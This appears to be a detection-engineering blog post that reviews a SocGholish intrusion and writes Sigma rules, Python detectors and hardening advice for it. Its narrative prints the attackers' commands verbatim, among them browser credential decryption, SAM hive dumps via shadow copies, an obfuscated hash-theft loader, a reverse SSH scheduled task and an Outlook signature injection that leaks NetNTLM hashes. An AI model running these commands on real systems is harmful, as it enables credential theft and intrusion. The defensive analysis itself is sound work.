*Published: 1/19/2025*

> **High-level Overview:** We will review a **SocGholish** (FakeUpdates) intrusion, which progressed to late-stage activity after a dwell time of roughly 30 days. There was a suspected hand-off to a secondary threat actor, presumably an operator associated with the **RansomHub** Ransomware-as-a-Service (RaaS). We are going to review the intrusion through the lens of Detection Engineering. I suspect those in threat hunting/intel have some interest in the full narrative, so I'll attempt to speed through the intrusion at a high level.

## Pre-Delivery / Site Compromise

- A Canadian outdoor magazine WordPress site was compromised
    - Whether this was the result of compromised credentials or an exploited vulnerability in the site or its installed plugins is unknown.
- JavaScript for a traffic distribution system (TDS) was injected into the site

## Delivery

- User visits the compromised WordPress site (Canadian outdoor magazine)
- User clicks "Update Browser" when prompted
- This downloads and promptly executes **Update.js** from Chrome

> **Note:**
> There was no direct user execution. This was direct from Chrome.exe -> wscript.exe (Update.js)

## Detonation

- **Update.js** determines whether the host is domain-joined
    - If it is not domain-joined, [TA582](https://www.huntress.com/blog/fake-browser-updates-lead-to-boinc-volunteer-computing-software "https://www.huntress.com/blog/fake-browser-updates-lead-to-boinc-volunteer-computing-software") deploys AsyncRAT or the BOINC RAT
    - If it is domain-joined (the scenario discussed here)
        - Invokes discovery commands
        - Deploys a second-stage profiling script
            - `\AppData\Local\Temp\1\852bf403.js`

It then writes the task **\OneDrive Per-Machine Standalone Update Task** and proceeds to run enumeration commands through the **OneDriveStandaloneUpdater.exe** binary. The TA also performs an injection into **RtkAudUService64.exe** to run four separate discovery commands (i.e. nltest).

The initial access broker (IAB) has a foothold established under a single user context, with the **OneDriveStandaloneUpdater** binary used for issuing hands-on-keyboard commands. They likely proceed to hand off access to an affiliate Ransomware-as-a-Service (RaaS) operator. This first spurt of behavior occurred from December 10th to December 13th. Up to this point, all behavior spawned from the following parent processes:

- `"C:\Windows\System32\WScript.exe" "C:\Users\username\Downloads\Uрdate.js"`
- `"C:\Windows\System32\wscript.exe" "C:\Users\username\AppData\Local\Temp\1\852bf403.js"`
- `"C:\Windows\System32\DriverStore\FileRepository\realtekservice.inf_amd64\RtkAudUService64.exe" -background`
- `C:\Users\username\AppData\Local\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe`

### IAB spawned commands

#### Discovery / Enumeration

```powershell
ipconfig /all
systeminfo
schtasks /query /fo LIST /v
findstr "OneDrive"
net accounts /domain
net use
net user /domain
ping -n 1 domain_controller
dir C:\users\username\*vpn /s
net user username /domain
net group "domain users" /domain
net localgroup administrators
net users /domain
net group "Domain Admins" /domain
ping -n 1 domain_controller
ping domain_controller
ping file_share_svr
ping domain_controller
ping -n 1 server
ping server
taskkill /f /im onedrivestandaloneupdater.exe
taskkill /f /im onedrive.exe
tasklist
tasklist /v
findstr pythonw.exe
nltest /domain_trusts
nltest /dclist:
net group "DOmain Admins" /domain
powershell -c "$searcher = New-Object System.DirectoryServices.DirectorySearcher([ADSI]''); $searcher.Filter = '(&(objectCategory=person)(objectClass=user)(mail=*))'; $searcher.PageSize = 1000; $searcher.PropertiesToLoad.Add('mail') > $null; $domains = $searcher.FindAll() | ForEach-Object { $_.Properties['mail'][0] -replace '^[^@]+@', '' }; $domains | Group-Object | Sort-Object Count -Descending | ForEach-Object { '{0,-20} | {1}' -f $_.Name, $_.Count }"
powershell -c "$searcher = New-Object System.DirectoryServices.DirectorySearcher([ADSI]''); $searcher.Filter = '(&(objectCategory=computer)(operatingSystem=*Server*))'; $searcher.PageSize = 1000; $searcher.PropertiesToLoad.Add('dnshostname') > $null; $searcher.FindAll() | ForEach-Object { $_.Properties['dnshostname'][0] }"
```

#### Credential Stealing

```powershell
powershell -c "$2=((gc "C:\Users\username\AppData\Local\Microsoft\Edge\'User Data'\'Local State'").split(',')-replace'app_bound_encrypted_key',''|sls encrypted_key)-replace'\"}','' -replace'\"encrypted_key\":\"','' -replace '\"os_crypt\":{','';$3=[System.Convert]::FromBase64String($2);$3=$3[5..($3.length-1)];Add-Type -AssemblyName System.Security;[System.Security.Cryptography.ProtectedData]::Unprotect($3,$null,[Security.Cryptography.DataProtectionScope]::CurrentUser)"
powershell -c "$2=((gc "C:\Users\username\AppData\Local\Google\Chrome\'User Data'\'Local State'").split(',')-replace'app_bound_encrypted_key',''|sls encrypted_key)-replace'\"}','' -replace'\"encrypted_key\":\"','' -replace '\"os_crypt\":{','';$3=[System.Convert]::FromBase64String($2);$3=$3[5..($3.length-1)];Add-Type -AssemblyName System.Security;[System.Security.Cryptography.ProtectedData]::Unprotect($3,$null,[Security.Cryptography.DataProtectionScope]::CurrentUser)"
powershell -c dir "$env:APPDATA\Mozilla\Firefox\Profiles\*logins.json"
copy "C:\Users\username\AppData\Local\Microsoft\Edge\User Data\Default\Login Data" C:\Users\username\AppData\Local\0395edg.bin& copy "C:\Users\username\AppData\Local\Google\Chrome\User Data\Default\Login Data" C:\Users\username\AppData\Local\0396chr.bin
```

The TA also performed NTLM hash theft via the [Internal Monologue](https://github.com/eladshamir/Internal-Monologue) tool.
```powershell
POWErshell "( NEw-oBJEcT systeM.iO.stREAMReAdEr( ( NEw-oBJEcT SYsTEm.Io.CoMpReSSIOn.DeflAtEsTReAM([SYSTem.Io.meMORYSTREaM][sysTeM.CONverT]::FrOMBAse64STRiNG ( '7Rxrc9u48Xtm8h8QTdqhzjJPkh3Hjc/pKbaSaM6vsZRcW8f1UCIksaFIHh+21TT/...='), [Io.CoMPrEssIoN.CoMPREssIOnMode]::dEcOMprEsS )), [syStem.teXt.eNcOdINg]::AsciI)).ReaDtoeNd( )| & ( $ShElLID[1]+$ShEllId[13]+'X')"
```

![[cyberchef_internalmonologue.png]]

#### Staging

```powershell
powershell wget payload
"C:\Windows\System32\cmd.exe" /C rename "C:\Users\username\AppData\Local\Temp\1\rad44713.tmp" "853cf503.js"
"C:\Windows\System32\cmd.exe" /C copy "C:\Program Files\Microsoft OneDrive\OneDriveStandaloneUpdater.exe" C:\Users\username\AppData\Local\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe >> "C:\Users\username\AppData\Local\Temp\1\radC3509.tmp"
cmd.exe /c C:\Users\username\AppData\Local\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe
"C:\Windows\System32\cmd.exe" /C rename "C:\Users\username\AppData\Local\Microsoft\OneDrive\radDB4A6.tmp" "version.dll"
"C:\Windows\System32\cmd.exe" /C rename "C:\Users\username\AppData\Local\Microsoft\OneDrive\rad71AEF.tmp" "tmp44BC.dll"
curl.exe https://www.python[.]org/ftp/python/3.12.0/python-3.12.0-embed-amd64.zip -o C:\Users\username\AppData\Local\python3.12.zip
tar -xf C:\Users\username\AppData\Local\python3.12.zip -C C:\Users\username\AppData\Local\python3.12\
curl.exe https://bootstrap.pypa[.]io/pip/pip.pyz -o C:\Users\username\AppData\Local\python3.12\pip.pyz
C:\Users\username\AppData\Local\python3.12\pythonw.exe C:\Users\username\AppData\Local\python3.12\pip.pyz --trusted-host files.pythonhosted.org --trusted-host pypi.org install pycryptodome virtualenv requests pipx --upgrade pip --no-warn-script-location
```

#### Persistence

```powershell
schtasks /run /tn "python-pip"
schtasks /query /tn "python-pip" /v /fo list
powershell $a = New-ScheduledTaskAction -WorkingDirectory 'C:\Users\username\AppData\Local\Microsoft\OneDrive' -Execute 'OneDriveStandaloneUpdater.exe';$t = New-ScheduledTaskTrigger -Once -At (Get-Date) -RepetitionInterval (New-TimeSpan -Minutes 1);$s = New-ScheduledTaskSettingsSet -ExecutionTimeLimit '00:00:00' -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries;Register-ScheduledTask -TaskName 'OneDriveStandaloneUpdater' -Action $a -Trigger $t -Settings $s
powershell $a = New-ScheduledTaskAction -WorkingDirectory 'C:\Users\username\AppData\Local\python3.12' -Execute 'pythonw.exe' -Argument 'popy.py';$t = New-ScheduledTaskTrigger -Once -At (Get-Date) -RepetitionInterval (New-TimeSpan -Minutes 1);$s = New-ScheduledTaskSettingsSet -ExecutionTimeLimit '00:00:00' -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries;Register-ScheduledTask -TaskName 'python-pip' -Action $a -Trigger $t -Settings $s
```

### Switching Hands - RaaS Operator enters the scene

> Although this was stopped before actions on objective were achieved, I suspect that the operator was associated with RansomHub and had the intent to deploy a RansomHub (RaaS) payload.

After a dwell time of roughly 30 days, the presumable ransomware operator proceeds to move laterally using the foothold established by the IAB.
#### Discovery / Enumeration

```powershell
netstat -a
netstat
tracert $IPv4
tracert $domain
nslookup $domain
ipconfig /flushdns
tracert yahoo.com
ping yahoo.com
ping $domain
net user $username /domain
net user $username
net users
net localgroup administrators
dir \\$netdrive\c$
quser
qwinsta /server
```

#### Persistence

```powershell
schtasks /create /tn "Update" /tr "ssh.exe -R 7777 -p 443 -o StrictHostKeyChecking=no user@$IPv4" /sc minute /mo 5 /ru SYSTEM
schtasks /run /tn "Update"
reg add "HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{}\InprocServer32" /ve /t REG_SZ /d "C:\Users\username\AppData\Local\Temp\msedge.dll" /f
powershell $a = New-ScheduledTaskAction -WorkingDirectory 'C:\Users\username\AppData\Local\ConnectedDevicesPlatform\get-pip' -Execute 'pythonw.exe' -Argument 'py1.py';$t = New-ScheduledTaskTrigger -Once -At (Get-Date) -RepetitionInterval (New-TimeSpan -Minutes 1);$s = New-ScheduledTaskSettingsSet -ExecutionTimeLimit '00:00:00' -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries;Register-ScheduledTask -TaskName 'fontdrvr1' -User 'System' -Action $a -Trigger $t -Settings $s
```

**Various persistence names were observed as the TA moved laterally. These are some of the naming conventions that were used:**

- \fontdrvr1
- \Update
- \libffi
- \libfi

> **Note:**
> All observed persistence mechanisms were related to **Reverse SSH** or **proxy clients** written in Python, obfuscated with pyobfuscate[.]com

#### Email Signature Injection

The technique injects a malicious SMB URL (`file://$IPv4/s`) into the email signature. When Outlook renders this signature, it attempts to connect to the specified SMB share. This connection attempt causes the system to send the user's NetNTLM hash to the attacker-controlled server, allowing for potential credential theft or relay attacks.
```powershell
powershell.exe cat $env:APPDATA\Microsoft\Signatures\*.htm
powershell -Command "Get-ChildItem "$env:APPDATA\Microsoft\Signatures\*.htm" | ForEach-Object { $content = Get-Content -Raw $_.FullName; $updatedContent = $content -replace '</body>', '<img src="file://$IPv4/s"></body>'; Set-Content -Path $_.FullName -Value $updatedContent }"
```

Spoken differently, this would route peer and victim email clients over SMB (port 445) to capture NetNTLM hashes. This technique allowed the TA to perform [**Email Contact Reconnaissance**](https://www.esentire.com/blog/socgholish-sets-sights-on-victim-peers). Think of this conceptually as capturing a Wi-Fi authentication handshake. Read more about this technique [here](https://research.nccgroup.com/2021/01/15/sign-over-your-hashes-stealing-netntlm-hashes-via-outlook-signatures/).

#### Credential Stealing

```powershell
powershell -c "$2=((gc "%localappdata%\Microsoft\Edge\'User Data'\'Local State'").split(',')-replace'app_bound_encrypted_key',''|sls encrypted_key)..."
copy "%localappdata%\Google\Chrome\User Data\Default\Login Data" C:\programdata\0396chr.bin
copy "%localappdata%\Microsoft\Edge\User Data\Default\Login Data" C:\programdata\0395edg.bin
vssadmin list shadows
certutil -encode \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1255\windows\system32\config\security c:\se1.txt
certutil -encode \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1255\windows\system32\config\system c:\sy1.txt
certutil -encode \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1255\windows\system32\config\sam c:\sa1.txt
```

#### Covering Tracks / Evasion

##### Artifact Removal

```powershell
del c:\programdata\0395edg.bin
del c:\programdata\0396chr.bin
del C:\Programdata\domain_1.txt
del C:\Programdata\domain_2.txt
del C:\Programdata\server.txt
```

## Swapping Lenses

![[they_live.png]]

Now that we have gotten past the narrative for the threat intelligence folks, let's change focus to cutting off future infections at the knees.
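Starting with the email signature injection from the narrative above, here is an added defensive check, not code from the original post: it parses Outlook signature `.htm` files and reports any `<img src>` that points at a `file://` URL or UNC path, which is exactly what forces the SMB authentication. The directory path, file names, and the 203.0.113.10 address are constructed for the demo.

```python
import re
import tempfile
from html.parser import HTMLParser
from pathlib import Path

# file:// URLs and UNC paths both make Outlook open an SMB (445) connection
SMB_SOURCE = re.compile(r"^(file:|\\\\)", re.IGNORECASE)


class _ImgSrcCollector(HTMLParser):
    """Collects every <img src=...> value, tolerant of the loose HTML Outlook writes."""

    def __init__(self):
        super().__init__()
        self.sources = []

    def handle_starttag(self, tag, attrs):
        if tag == "img":
            for name, value in attrs:
                if name == "src" and value:
                    self.sources.append(value.strip())


def suspicious_sources(html):
    """Return the img src values in `html` that point at file:// or UNC targets."""
    collector = _ImgSrcCollector()
    collector.feed(html)
    return [src for src in collector.sources if SMB_SOURCE.match(src)]


def scan_signature_dir(directory):
    """Map each signature file under `directory` to its SMB-pointing img sources.

    On a live host point this at %APPDATA%\\Microsoft\\Signatures; the injected
    signature in the post appended <img src="file://$IPv4/s"> before </body>.
    """
    findings = {}
    for path in sorted(Path(directory).glob("*.htm*")):
        hits = suspicious_sources(path.read_text(encoding="utf-8", errors="replace"))
        if hits:
            findings[path.name] = hits
    return findings


# Constructed signature bodies (203.0.113.10 is a documentation address, not a real host)
CLEAN_SIGNATURE = '<html><body><p>Jane Doe</p><img src="cid:logo.png"></body></html>'
INJECTED_SIGNATURE = ('<html><body><p>Jane Doe</p><img src="cid:logo.png">'
                      '<img src="file://203.0.113.10/s"></body></html>')


def demo():
    """Write both constructed signatures to a temp folder and scan it offline."""
    with tempfile.TemporaryDirectory() as tmp:
        Path(tmp, "clean.htm").write_text(CLEAN_SIGNATURE, encoding="utf-8")
        Path(tmp, "injected.htm").write_text(INJECTED_SIGNATURE, encoding="utf-8")
        return scan_signature_dir(tmp)


if __name__ == "__main__":
    print(demo())  # {'injected.htm': ['file://203.0.113.10/s']}
```

A legitimate signature only ever references `cid:` attachments or `https://` hosted logos, so any hit from this scan is worth an immediate look at the file's modification time and the process that wrote it.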
The unfortunate reality is that Detection Engineering is often nuanced, and rules that function in some environments cannot be applied universally. These ideas take the perspective of an intrusion that impacts a Fortune 500 company, and there will likely be minimal takeaways from the EDR vendor perspective. I've learned a few recurring themes over the past several months:

- Do not compete with your EDR
- Complement the detection stack with hardening
- There is a limited number of detection rules (bullets) to fire
- Every detection has an imposed cost, both in response time and maintenance

This said, let's pivot to detection opportunities.

## Hunting / Detection Opportunities

### Detection 1: Targeting Delivery

---

Targeting initial access has always been a favorite of mine. In my opinion, this is where detection engineering has the highest reward output. There are a limited number of ways into a network, and the bad actors have to get increasingly creative.

![[initial_access.png]]

As explained above, the delivery required minimal user interaction, making these JavaScript (JS) based campaigns particularly insidious for corporate environments, where default Windows installs open JS files with wscript.exe.

Flag on script hosts or shell sessions spawning from the browser:

```yaml
title: Browser Spawning Script or Shell Execution
id: 123e4567-e89b-12d3-a456-426614174001
description: Detects browsers spawning script hosts or shells, indicative of IAB delivery like SocGholish Update.js.
status: experimental
author: bencrypted
date: 2025/01/19
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        ParentImage|contains:
            - 'chrome'
            - 'msedge'
            - 'firefox'
            - 'chromium'
            - 'vivaldi'
            - 'iexplore'
            - 'opera'
            - 'brave'
        Image|endswith:
            - '\wscript.exe'
            - '\cscript.exe'
            - '\powershell.exe'
            - '\powershell_ise.exe'
            - '\pwsh.exe'
            - '\mshta.exe'
    condition: selection
fields:
    - ParentImage
    - Image
    - CommandLine
falsepositives:
    - Legitimate browser extensions or IT scripts
level: medium
```

While the main goal of this was to catch the execution of **wscript.exe** (Update.js) directly from a browser process, I was able to scope out additional executions that could be deemed suspicious or compliance policy issues with minimal noise.

> **Note:** You may notice that *cmd.exe* is missing. Unfortunately, there is far too much noise in most environments to hone in on *cmd.exe* directly without some extreme filtering. This may be feasible in a small or medium-sized business; however, it was not achievable in my specific environment.

### Detection 2: Output Piped to Temporary (.tmp) Files

---

Nearly all commands from the IAB redirected output (`>>`) to .tmp files under `%AppData%`:

- parent.process.name:
    - `"C:\Windows\System32\WScript.exe" "C:\Users\username\Downloads\Uрdate.js"`
- process.cmdline:
    - `"C:\Windows\System32\cmd.exe" /C net accounts /domain >> "C:\Users\username\AppData\Local\Temp\1\rad0BC6C.tmp"`

While this may technically violate the lesson of not competing with your EDR, there is potential to flag on this behavior more broadly with the context of it being [**Suspicious Here**](https://medium.com/@vanvleet/identifying-and-classifying-attack-techniques-002c0c4cd595). EDR vendors typically have rules in place targeting piped output to temporary files under `%AppData%` via specific script hosts such as `wscript.exe`.
However, given that we don't have to inherently worry about false positive ratios from tens of thousands of organizations, we can baseline this behavior across our environment and cast a wider net. This said, we could proceed with querying our environment for historical data with something resembling this search:

```yaml
title: Script Host Piping Output to Temporary Files
id: 987fcdeb-12ab-34cd-56ef-426614174002
description: Detects script hosts spawning processes that pipe output to .tmp files, common in IAB staging.
status: experimental
author: bencrypted
date: 2025/01/19
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        ParentImage|endswith:
            - '\wscript.exe'
            - '\cscript.exe'
        Image|endswith:
            - '\cmd.exe'
            - '\powershell.exe'
            - '\powershell_ise.exe'
            - '\pwsh.exe'
        # both substrings must be present in the same command line
        CommandLine|contains|all:
            - '>>'
            - '.tmp'
    condition: selection
fields:
    - ParentImage
    - Image
    - CommandLine
falsepositives:
    - Legitimate scripts redirecting output
level: medium
```

In this scenario, my specific environment had no benign activity redirecting data to `.tmp` files, so getting more granular with the `%AppData%` directory was not necessary. I could also broaden the scope further with either parent or child processes. That said, intrusions like these play a wonderful role in back-testing our existing rules, querying true positive data, and evaluating new detection logic. Never let a crisis go to waste.

### Detection 3: Clustering Endpoint Enumeration and Discovery

---

The general idea is to perform a correlation search / query that clusters enumeration commands per host over a 10-minute interval.
```yaml
title: clustered endpoint enumeration (edr-disco-proc-endpoint-enum)
id: b23fcdeb-78g9-81bc-d5fg-426614174007
description: "correlation rule flagging discovery commands from cmd.exe or powershell spawning systeminfo.exe, whoami.exe, ipconfig.exe, nltest.exe, or net.exe, requiring two matches within a 10-minute window"
status: experimental
author: ben
date: 2025/01/20
logsource:
    category: process_creation
    product: windows
detection:
    selection_discovery_1:
        ParentImage|endswith:
            - '\cmd.exe'
            - '\powershell.exe'
            - '\powershell_ise.exe'
        Image|endswith:
            - '\systeminfo.exe'
            - '\whoami.exe'
    selection_discovery_2:
        ParentImage|endswith:
            - '\cmd.exe'
            - '\powershell.exe'
            - '\powershell_ise.exe'
        Image|contains: '\ipconfig'
        CommandLine|contains: '/all'
    selection_discovery_3:
        ParentImage|endswith:
            - '\cmd.exe'
            - '\powershell.exe'
        Image|endswith:
            - '\nltest.exe'
            - '\net.exe'
        CommandLine|contains:
            - 'view /all'
            - 'config workstation'
            - 'get displayname'
            - 'domain_trusts'
            - 'domain computers'
            - 'domain admins'
    # exclusions are alternatives: the keyword or any listed parent suppresses a match
    filter_nexthink:
        CommandLine|contains: 'Nexthink'
    filter_agents:
        ParentImage|endswith:
            - '\nxtcod.exe'
            - '\taskeng.exe'
            - '\runonce.exe'
    timeframe: 10m
    condition: ((selection_discovery_1 or selection_discovery_2 or selection_discovery_3) and not (filter_nexthink or filter_agents)) | count() by host > 1
fields:
    - Image
    - ParentImage
    - CommandLine
falsepositives:
    - legitimate administrative diagnostics
    - system inventory scripts
level: medium
tags:
    - attack.discovery
    - attack.t1018
    - attack.t1069
```

Simulating this query logic against 90 days of historical data flagged only the red team and a single true-positive intrusion. But remember, detection engineering isn't one-size-fits-all. This specific logic might not work for many other environments. It's all about tailoring your approach to your unique setup.
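To make the correlation concrete, here is an added Python simulation of Detection 3 (example code, not from the original post) that applies the three selections and the exclusions to constructed process-creation events and then runs the `count() by host > 1` aggregation as a sliding 10-minute window. It uses one shared parent list for all three selections, and the hostnames, timestamps and command lines are constructed to mirror the IAB's discovery spurt.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Correlation parameters from the rule: more than one match per host within 10 minutes
WINDOW = timedelta(minutes=10)
THRESHOLD = 1

# One shared parent list stands in for the per-selection parent lists in the rule
SHELL_PARENTS = ("\\cmd.exe", "\\powershell.exe", "\\powershell_ise.exe")
NET_KEYWORDS = ("view /all", "config workstation", "get displayname",
                "domain_trusts", "domain computers", "domain admins")
EXCLUDED_PARENTS = ("\\nxtcod.exe", "\\taskeng.exe", "\\runonce.exe")


def is_discovery(ev):
    """True if the event matches selection_discovery_1, _2 or _3."""
    parent, image, cmd = (ev[k].lower() for k in ("ParentImage", "Image", "CommandLine"))
    if not parent.endswith(SHELL_PARENTS):
        return False
    if image.endswith(("\\systeminfo.exe", "\\whoami.exe")):
        return True
    if image.endswith("\\ipconfig.exe") and "/all" in cmd:
        return True
    return image.endswith(("\\nltest.exe", "\\net.exe")) and any(k in cmd for k in NET_KEYWORDS)


def is_excluded(ev):
    """Exclusions: the inventory-agent keyword or one of the listed parent images."""
    return ("nexthink" in ev["CommandLine"].lower()
            or ev["ParentImage"].lower().endswith(EXCLUDED_PARENTS))


def correlate(events, window=WINDOW, threshold=THRESHOLD):
    """Return {host: cluster} for each host with more than `threshold` matches in one window.

    A sliding window over the host's time-sorted matches reproduces the
    `count() by host > 1` aggregation with a 10m timeframe.
    """
    per_host = defaultdict(list)
    for ev in sorted(events, key=lambda e: e["ts"]):
        if is_discovery(ev) and not is_excluded(ev):
            per_host[ev["host"]].append(ev)
    alerts = {}
    for host, matches in per_host.items():
        start = 0
        for end, ev in enumerate(matches):
            while ev["ts"] - matches[start]["ts"] > window:
                start += 1  # drop matches that fell out of the window
            if end - start + 1 > threshold:
                alerts[host] = matches[start:end + 1]  # first qualifying cluster
                break
    return alerts


def _ev(ts, host, parent, image, cmd):
    return {"ts": datetime.fromisoformat(ts), "host": host,
            "ParentImage": parent, "Image": image, "CommandLine": cmd}


CMD = "C:\\Windows\\System32\\cmd.exe"
SYS32 = "C:\\Windows\\System32\\"
# Constructed events modelled on the IAB's discovery spurt; not real telemetry
SAMPLE_EVENTS = [
    # WS01: two discovery binaries 3.5 minutes apart -> clusters
    _ev("2024-12-10T14:02:00", "WS01", CMD, SYS32 + "systeminfo.exe", "systeminfo"),
    _ev("2024-12-10T14:05:30", "WS01", CMD, SYS32 + "nltest.exe", "nltest /domain_trusts"),
    # WS02: a lone ipconfig /all never reaches the threshold
    _ev("2024-12-10T09:00:00", "WS02", CMD, SYS32 + "ipconfig.exe", "ipconfig /all"),
    # WS03: two matches, but 15 minutes apart
    _ev("2024-12-10T10:00:00", "WS03", CMD, SYS32 + "whoami.exe", "whoami"),
    _ev("2024-12-10T10:15:00", "WS03", CMD, SYS32 + "net.exe", 'net group "Domain Admins" /domain'),
    # WS04: inventory agent writing to its own folder, removed by the exclusion
    _ev("2024-12-10T11:00:00", "WS04", CMD, SYS32 + "systeminfo.exe", "systeminfo >> C:\\ProgramData\\Nexthink\\inv.txt"),
    _ev("2024-12-10T11:01:00", "WS04", CMD, SYS32 + "whoami.exe", "whoami >> C:\\ProgramData\\Nexthink\\inv.txt"),
]

if __name__ == "__main__":
    for host, cluster in correlate(SAMPLE_EVENTS).items():
        print(host, [e["CommandLine"] for e in cluster])  # WS01 only
```

Swapping `SAMPLE_EVENTS` for a 90-day export of your own process-creation telemetry is the back-test described above, and tuning `WINDOW`, `THRESHOLD` or the keyword lists against that data is where the coverage-versus-noise trade-off gets decided.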
For instance, in my environment, the commands `ipconfig /all` and `net localgroup Administrators` were frequently called by a wide variety of agents, causing multiple false positive alerts to fire in a day. It's all about determining the appropriate balance of coverage versus noise.

### Detection 4: Scheduled Task Abuse

---

Most large enterprises have too much noise to flag on scheduled task creation alone; however, persistence is great to identify in the event that other points of visibility are missed in the fog. For this reason, EDR vendors cannot broadly alert on the creation of persistence. This query is meant to flag on a number of criteria. Whether PowerShell creates a scheduled task directly or the schtasks binary is called, it will flag. It searches for stated time intervals for the schtasks binary and hones in on a variety of script hosts, shell sessions, file downloads, and direct calls to environment variables. During the evaluation process, this query was applied to historical data from the intrusion. The results indicated that it would have successfully identified suspicious activity on three separate systems with no false positives over a 90-day period against upwards of 50,000 endpoints.

```yaml
title: Suspicious Persistence via Scheduled Tasks or PowerShell
id: 789cd012-56ef-78gh-90ij-426614174016
description: Detects persistence attempts via scheduled tasks or PowerShell from unverified or suspicious parent processes.
status: stable
author: bencrypted
date: 2025/02/19
logsource:
    category: process_creation
    product: windows
detection:
    # Parent process conditions: unverified signature or specific names
    parent_signature_verified:
        ParentCodeSignature:
            - 'valid'
            - 'verified'
    parent_names:
        ParentImage|endswith:
            - '\cmd.exe'
            - '\wscript.exe'
            - '\cscript.exe'
            - '\rundll32.exe'
            - '\regsvr32.exe'
            - '\wmic.exe'
            - '\mshta.exe'
            - '\powershell.exe'
            - '\pwsh.exe'
            - '\powershell_ise.exe'
            - '\wmiprvse.exe'
            - '\wsmprovhost.exe'
            - '\winrshost.exe'
        ParentOriginalFileName|endswith:
            - 'Command Prompt'
            - 'Microsoft ® Windows Based Script Host'
            - 'Microsoft ® Console Based Script Host'
            - 'Windows host process (Rundll32)'
            - 'Microsoft(C) Register Server'
            - 'WMI Commandline Utility'
            - 'Microsoft (R) HTML Application host'
            - 'Windows PowerShell'
            - 'PowerShell'
            - 'Windows PowerShell ISE'
            - 'WMI Provider Host'
            - 'Host process for WinRM plug-ins'
            - "Host Process for WinRM's Remote Shell plugin"
    parent_exclusion:
        ParentImage|endswith:
            - '\gpscript.exe'
            - '\msiexec.exe'
            - '\author-nvm.exe'
            - '\deploy-application.exe'
    # schtasks.exe creating a task ...
    schtasks_create:
        Image|endswith: '\schtasks.exe'
        CommandLine|contains:
            - '/create'
            - '-create'
    # ... on a stated interval ...
    schtasks_interval:
        CommandLine|contains:
            - 'once'
            - 'minute'
            - 'hourly'
            - 'daily'
            - 'onlogon'
            - 'onstart'
    # ... whose action is a download, script host, shell, ssh, python or environment variable
    suspicious_payload:
        CommandLine|contains:
            - 'curl'
            - 'wget'
            - 'downloadstring'
            - 'get-itemproperty'
            - 'cmd.exe /c'
            - 'powershell'
            - 'pwsh.exe'
            - 'mshta'
            - 'wscript'
            - 'cscript'
            - 'rundll32'
            - 'ssh'
            - 'python'
            - '$env:'
    # schtasks.exe importing a task definition from a staging directory
    schtasks_xml:
        Image|endswith: '\schtasks.exe'
        CommandLine|contains:
            - '/xml'
            - '-xml'
    xml_staging_path:
        CommandLine|contains:
            - 'c:\windows\temp\'
            - 'c:\temp\'
            - '\perflogs\'
            - '\users\public\'
    xml_extension:
        CommandLine|contains: '.xml'
    # PowerShell building the task directly, as seen in both stages of this intrusion
    powershell_task:
        Image|endswith:
            - '\powershell.exe'
            - '\pwsh.exe'
        CommandLine|contains: 'New-ScheduledTaskAction'
    condition: (not parent_signature_verified or parent_names) and not parent_exclusion and ((schtasks_create and schtasks_interval and suspicious_payload) or (schtasks_xml and xml_staging_path and not xml_extension) or powershell_task)
fields:
    - ParentImage
    - Image
    - CommandLine
    - ParentCodeSignature
falsepositives:
    - Legitimate scheduled tasks or scripts by IT admins
level: high
```

### Detection 5: Leveraging Built-in Alerts

---

A detection strategy's effectiveness ultimately hinges on the reliability of your data sources. In this scenario, we encountered significant asset visibility challenges with a tool designed to parse, monitor, and alert on Windows event logs. Given the substantial gaps in logging from domain controllers, I deployed a complementary rule leveraging the EDR layer, which alerts on built-in platform logic such as **LDAP Kerberoastable SPNs**, **Powersploit Kerberoast**, and **Many SPN Requests With Rubeus Ldap Query**. This new rule provides comparable coverage for detecting Kerberoasting attacks, ensuring we maintain security monitoring despite limitations in our primary logging system.

### Mapping via Canvas

![[infection_canvas.png]]

### Detection Wrap Up

I'm certain there are plenty of additional takeaways one could make from this intrusion. In the same way that a picture is worth a thousand words, an intrusion can rack up its fair share of post-mortem detection rules. There will always be more opportunities to flag on. For instance, I didn't even touch on flagging the email signature injection, SMB traffic from an email client, file modification of browser credentials (Login Data), querying for registry keys (Terminal Server Client), etc. Some rules are more precise, focusing on specific behaviors with high accuracy but potentially missing some incidents.
Others have more recall, casting a wider net to catch more potential threats but possibly including false positives. The list of both ideas and considerations goes on, but I hope this at least opened up some of the thought process behind Detection Engineering. It's an ongoing process of refinement and adaptation, always seeking to stay one step ahead of evolving threats.

## Hardening

I'll separate these recommendations by priority. Priority 1 items are easy to implement with a large impact, while priority 2 items may require a little more complexity, grunt work, and advocacy to push forward.

### Priority 1

- Default-open [script files](https://gist.github.com/ChuckFrey/7f77df907a53309ca5d30387989ff143) with [notepad.exe](https://redcanary.com/blog/threat-intelligence/notepad-javascript/)
- Block SMB traffic at network boundaries
- Enforce SMB signing and encryption
- Disable NTLMv1 authentication

### Priority 2

- Enable SMB 3.0 or later for improved security features
- Transition from NTLM to Kerberos authentication
- Implement DNS-based ad blocking (DNS sinkholing)
- Force Always-On VPN
- Ensure firewall/VPN security mitigations are in play
- Endpoint Detection and Response management
    - Agents must be monitored for good health
    - Agents kept closely following the released update if not set to auto-update
- Block script and remote PowerShell executions from non-administrators
- Deploy browser isolation technologies

Sometimes the simplest mitigations are the best. These measures create multiple layers of defense, making it more challenging for threat actors to succeed and reducing the burden on our end users.

## Acknowledgements

Special thanks go out to monitorsg for helping understand the infection stages in detail, along with RussianPanda for pointers on decoding an obfuscated proxy client script!
## References

- [Identifying and Classifying Attack Techniques](https://medium.com/@vanvleet/identifying-and-classifying-attack-techniques-002c0c4cd595)
- [Prioritizing Detection Engineering](https://medium.com/starting-up-security/prioritizing-detection-engineering-b60b46d55051)
- [Balancing Act: Coverage vs Cost](https://medium.com/@vanvleet/the-threat-detection-balancing-act-coverage-vs-cost-cdb71d21412f)
- [eSentire detailing Email Signature injection](https://www.esentire.com/blog/socgholish-sets-sights-on-victim-peers)
